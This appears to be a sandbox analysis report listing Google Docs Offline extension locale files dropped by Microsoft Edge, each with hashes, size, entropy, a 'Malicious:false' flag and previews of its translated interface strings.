                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
